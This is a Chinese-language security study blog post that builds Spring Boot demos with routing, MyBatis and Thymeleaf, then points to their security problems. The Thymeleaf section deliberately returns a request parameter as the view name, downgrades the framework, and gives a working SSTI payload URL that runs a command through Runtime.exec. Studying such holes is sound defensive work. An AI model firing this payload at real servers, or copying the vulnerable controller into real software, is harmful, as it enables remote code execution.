时间轴:
data:image/s3,"s3://crabby-images/88aea/88aea8e7f8d64d5df5144035729ebe4eb05a580c" alt=""
Java知识点
功能:数据库操作,文件操作,序列化数据,身份验证,框架开发,第三方库使用等.
框架库:MyBatis,SpringMVC,SpringBoot,Shiro,Log4j,FastJson等
技术:Servlet,Listen,Filter,Interceptor,JWT,AOP,反射机制待补充
安全:SQL注入,RCE执行,反序列化,脆弱验证,未授权访问,待补充
安全:原生开发安全,第三方框架安全,第三方库安全等,待补充
什么是springboot?
Spring Boot 是由 Pivotal 团队提供的一套开源框架,可以简化 spring 应用的创建
及部署。它提供了丰富的 Spring 模块化支持,可以帮助开发者更轻松快捷地构建出企业
级应用。 Spring Boot 通过自动配置功能,降低了复杂性,同时支持基于 JVM 的多种开
源框架,可以缩短开发时间,使开发更加简单和高效。
演示案例:
SpringBoot-Web 应用-路由响应
SpringBoot-数据库应用-Mybatis
SpringBoot-模版引擎-Thymeleaf
SpringBoot-Web 应用-路由响应
#SpringBoot-Web 应用 - 路由响应
参考: https://springdoc.cn/spring-boot/
1 、路由映射
@RequestMapping @GetMapping 等
2 、参数传递
@RequestParam
3 、数据响应
@RestController @Controller
@RestController 注解相当于 @ResponseBody + @Controller 合在一起的作用。
程序创建:
1.创建一个新的项目:
data:image/s3,"s3://crabby-images/4e30b/4e30bab6fa049f60daa69661d8bd8233386e5588" alt=""
服务器url可以选择两个:
2.点击下一步
版本会根据url的不同而给出不一样的答复。
选择适合的Web组件:Spring Web
data:image/s3,"s3://crabby-images/e9a76/e9a76a5fdc343aaed632032f997bcb9917a1a8de" alt=""
3.注意在右下角加载Maven项目,删除demos.web项目,创建一个controller.IndexController
data:image/s3,"s3://crabby-images/79a98/79a9817ec4406d2c48536cf12e4d5a441e474a54" alt=""
4.运行打开的端口为8080。
data:image/s3,"s3://crabby-images/5cbfe/5cbfe42529ff39f1d9758c4c5f0621b9e5c857b3" alt=""
若端口被占用,可以在application.properties修改端口
IndexController:
java
package cn.xiaodou.springboottest.controller;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.*;
@RestController
public class IndexController {
//指定GET请求的访问路由
@RequestMapping(value = "/xiaodiget",method = RequestMethod.GET)
//@GetMapping(value = "/xiaodiget")
public String getindex(){
return "get test";
}
//指定POST请求的访问路由
@RequestMapping(value = "/xiaodipost",method = RequestMethod.POST)
//@PostMapping(value = "/xiaodipost")
public String getpost(){
return "post test";
}
//指定GET请求的访问路由 带参数名name
@RequestMapping(value = "/xiaodiget_g",method = RequestMethod.GET)
//@GetMapping(value = "/xiaodiget")
public String get_g(@RequestParam String name){
return "get test"+name;
}
//指定POST请求的访问路由 带参数名name
@RequestMapping(value = "/xiaodiget_g",method = RequestMethod.POST)
//@GetMapping(value = "/xiaodiget_g")
public String get_p(@RequestParam String name){
return "post test"+name;
}
}
可以选择点击显示模块的所有端点:
data:image/s3,"s3://crabby-images/3f751/3f751ab1ec62217415fc065c8d06cf96d6c7c4d8" alt=""
拥有get和post两个请求。
data:image/s3,"s3://crabby-images/00d45/00d45e2140f0df4f7ad542a4ae9e09f0a377217b" alt=""
此为springboot报错界面:
data:image/s3,"s3://crabby-images/b2760/b27608be4652e5a62fda714349b712e317f8119e" alt=""
get响应:
data:image/s3,"s3://crabby-images/5b391/5b391f90e922a057ec1e41b94987e7af4d2b7beb" alt=""
post响应:
使用postman:
data:image/s3,"s3://crabby-images/2043a/2043a67b38eec4a3bbfa5ba82e390eca0e3752c6" alt=""
get响应 带参数:
http://127.0.0.1:8080/xiaodiget_g?name=123
data:image/s3,"s3://crabby-images/9820c/9820ccfce25b8bd19c7dca801e7c949c88fc293c" alt=""
post响应 带参数:
http://127.0.0.1:8080/xiaodiget_g
data:image/s3,"s3://crabby-images/6a0bd/6a0bdf331e90b38a9200dc6c7441b06dea194673" alt=""
@RestController与@Controller的区别:
3 、数据响应
@RestController @Controller
@RestController 注解相当于 @ResponseBody + @Controller 合在一起的作用。
data:image/s3,"s3://crabby-images/99f00/99f00f4a493f78508f9d7e9cdd1218e5c6ea5951" alt=""
需要在结尾加一个@ResponseBody,从而使用@RestController更好用一点
SpringBoot-数据库应用-Mybatis
1.创建项目SpringBootMybatis:
data:image/s3,"s3://crabby-images/ce871/ce8711deab73a83b1ef3ae6e39745878761a1229" alt=""
2.选择这三个依赖项目:
data:image/s3,"s3://crabby-images/c1da7/c1da7bd6af1d570d424788de2b85d4c0dbc955ce" alt=""
3.数据库先创建需操作的数据
data:image/s3,"s3://crabby-images/ce1dc/ce1dc53d92673304fea9c8f25879475cfab9f702" alt=""
data:image/s3,"s3://crabby-images/0cfe5/0cfe5dac45ba517cecae9b579b6339ecaaefd91a" alt=""
4.若未添加勾选,则需要加入代码到pom.xml里面(项目添加Mybatis&数据库驱动)
data:image/s3,"s3://crabby-images/af0d1/af0d17736ba7f82826c031c285b7a6715615b75b" alt=""
java
-pom.xml
<dependency>
<groupId>org.mybatis.spring.boot</groupId>
<artifactId>mybatis-spring-boot-starter</artifactId>
<version>2.2.2</version>
</dependency>
<dependency>
<groupId>com.mysql</groupId>
<artifactId>mysql-connector-j</artifactId>
<scope>runtime</scope>
</dependency>
5.修改application.yml(项目配置数据库连接信息)
javascript
-application.yml
spring:
datasource:
url: jdbc:mysql://localhost:3306/demo01
username: root
password: 123456
driver-class-name: com.mysql.cj.jdbc.Driver
data:image/s3,"s3://crabby-images/7b291/7b291f8353d3d4839dc81c02fb12586dfac2cfd6" alt=""
6.在软件包下创建entity.User去创建User类用来操作数据库数据
可以使用alt+insert选择Getter和Setter进行添加id他们的字符
data:image/s3,"s3://crabby-images/ac3f2/ac3f28b89bb3280ce1fbf6b81a953c54a40c00dc" alt=""
data:image/s3,"s3://crabby-images/05db7/05db7385e74f0ae86b1e8b294174041b3e2207db" alt=""
tostring一样的构造方法:
data:image/s3,"s3://crabby-images/1df03/1df03bc0d6ae49251b0bb02436819db4174ae4b4" alt=""
User.java:
java
package com.example.springbootmybatils.entity;
public class User {
private Integer id;
private String username;
private String password;
public Integer getId() {
return id;
}
public void setId(Integer id) {
this.id = id;
}
public String getUsername() {
return username;
}
public void setUsername(String username) {
this.username = username;
}
public String getPassword() {
return password;
}
public void setPassword(String password) {
this.password = password;
}
@Override
public String toString() {
return "User{" +
"id=" + id +
", username='" + username + '\'' +
", password='" + password + '\'' +
'}';
}
}
6.创建Mapper动态接口代理类实现
data:image/s3,"s3://crabby-images/ff77a/ff77acc7842f88ba817277b604358d0696ada812" alt=""
java
package com.example.springbootmybatils.mapper;
import com.example.springbootmybatils.entity.User;
import org.apache.ibatis.annotations.Insert;
import org.apache.ibatis.annotations.Mapper;
import org.apache.ibatis.annotations.Select;
import java.util.List;
@Mapper
public interface UserMapper {
// 根据提供的id选择所有用户的SQL查询
@Select("select * from admin ")
public List<User> findAll(Integer id);
// 根据特定id选择所有用户的SQL查询
@Select("select * from admin where id=1")
public List<User> findID();
7.创建Controller实现Web访问调用
在软件包下创建一个GetadminController
data:image/s3,"s3://crabby-images/49d7e/49d7e9c505bcefac70f27c45ec95d96ae074c447" alt=""
完整代码:
java
package com.example.springbootmybatils.controller;
import com.example.springbootmybatils.entity.User;
import com.example.springbootmybatils.mapper.UserMapper;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.RestController;
import java.util.List;
@RestController
public class GetadminController {
@Autowired
private UserMapper UserMapper;
@GetMapping("/getadmin")
public List<User> getadmindata(@RequestParam Integer id){
List<User> all = UserMapper.findAll(id);
return all;
}
@GetMapping("/getid")
public List<User> getadminid(){
List<User> all = UserMapper.findID();
return all;
}
}
8.运行结果:
访问getadmin:
data:image/s3,"s3://crabby-images/61841/61841441e7e634440719758ca3401854a5a912d6" alt=""
访问getid:
data:image/s3,"s3://crabby-images/564b6/564b6bfcb02616be68faaa1050b1597a4642c808" alt=""
由于有json包:
data:image/s3,"s3://crabby-images/1c24d/1c24de69893c54da5434d9434bf4693cef49aa10" alt=""
数据格式都为json。
安全问题:
mybatis的sql注入。
https://baijiahao.baidu.com/s?id=1747445413331443209&wfr=spider&for=pc
MyBatis-sql注入问题_mybatis sql注入-CSDN博客
data:image/s3,"s3://crabby-images/28a16/28a16097259158314d7681ffbe150416cc79a86a" alt=""
data:image/s3,"s3://crabby-images/f033f/f033f6269631c2d7ec1f7ad510e5b1bcfb7a190d" alt=""
注入如下:
SpringBoot-模版引擎-Thymeleaf
1.创建项目ThyremeafDemo:
2.勾选项目:
3.配置文件都写到此文件中
data:image/s3,"s3://crabby-images/5a2e9/5a2e929b2640b02a4b14b5f09a11e6dfc5e5f909" alt=""
4.创建templates,在下面创建index.html。
放入渲染界面index.html:
html
<!DOCTYPE html>
<html xmlns:th="http://www.thymeleaf.org">
<head>
<meta charset="UTF-8">
<title>Title</title>
</head>
<body >
<span th:text="${data}">小豆安全</span>
</body>
</html>
5.在软件包下创建controller.ThymeleafController
注意:(还要看.idea出现workspace.xml这个文件没有)
// //@RestController ResponseBody index当做字符串显示操作
// //Controller 没有ResponseBody index当做资源文件去渲染
渲染回显:
data:image/s3,"s3://crabby-images/d0742/d074286679d09c871084e30222879980cb87021e" alt=""
未渲染回显:
data:image/s3,"s3://crabby-images/8808d/8808dbe6f8a106983f67b81e297055683320b891" alt=""
安全问题:
日常开发中:语言切换页面,主题更换等传参导致的SSTI注入安全问题
例如:更换中英文页面模板
data:image/s3,"s3://crabby-images/e58c9/e58c98b8464d8a8abb881c5ddba03644b09f6d26" alt=""
将其换成
data:image/s3,"s3://crabby-images/82584/82584263e9a12612adaa67b972911baffa40940b" alt=""
实操:
创建index-en.html:
html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Title</title>
</head>
<body>
</body>
</html>
修改ThymeleafController:
java
package cn.xiadou.thyremeafdemo.controller;
import org.springframework.stereotype.Controller;
import org.springframework.ui.Model;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.RestController;
@Controller
public class ThymeleafController {
// @RequestMapping(value = "/")
// public String index(Model model) {
// model.addAttribute("data","hello xiaodi");
// //@RestController ResponseBody index当做字符串显示操作
// //Controller 没有ResponseBody index当做资源文件去渲染
// return "index";
// }
@RequestMapping(value = "/test")
public String index() {
//@RestController ResponseBody index当做字符串显示操作
//Controller 没有ResponseBody index当做资源文件去渲染
return "test";
}
@RequestMapping(value = "/")
public String index(@RequestParam String lang) {
//@RestController ResponseBody index当做字符串显示操作
//Controller 没有ResponseBody index当做资源文件去渲染
return lang; //lang=en index-en
}
}
访问尝试一下:
http://127.0.0.1:8080/?lang=index-en
data:image/s3,"s3://crabby-images/41d6b/41d6bf787cc0cd5c8e7056130a0046df6d7e8074" alt=""
对于不同版本的Thymeleaf,他可能会造成漏洞:
data:image/s3,"s3://crabby-images/0daef/0daef7bc95db4ba6af68431cf1799f805d64629a" alt=""
使用阿里云的版本2.6.13:
data:image/s3,"s3://crabby-images/3180e/3180ea246c178b260d2d6d3f80845d19521262e1" alt=""
注入代码:(发现报错)
java
http://127.0.0.1:8080/?lang=__$%7bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22calc%22).getInputStream()).next()%7d__::.x
替换pom.xml使其变换版本:
java
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<groupId>org.springframework</groupId>
<artifactId>java-spring-thymeleaf</artifactId>
<version>1.0</version>
<parent>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-parent</artifactId>
<!--latest-->
<version>2.2.0.RELEASE</version>
</parent>
<dependencies>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-thymeleaf</artifactId>
</dependency>
</dependencies>
<properties>
<java.version>1.8</java.version>
</properties>
<build>
<plugins>
<plugin>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-maven-plugin</artifactId>
</plugin>
</plugins>
</build>
</project>
重新再次注入:
data:image/s3,"s3://crabby-images/bf007/bf0079b5864209d35b41e8e73ebba732f0130302" alt=""
data:image/s3,"s3://crabby-images/00655/00655be3b067d89ff71540ec33991a66dd2b662e" alt=""
重新构建后需要对各个项目:
对应使用idea中错误解析,将报错的包一一添加类路径中即可
注入成功:
data:image/s3,"s3://crabby-images/90e83/90e838b34add2c810acd841eab13001c10ed248b" alt=""
此文章由李豆豆喵和番薯小羊卷~共同完成。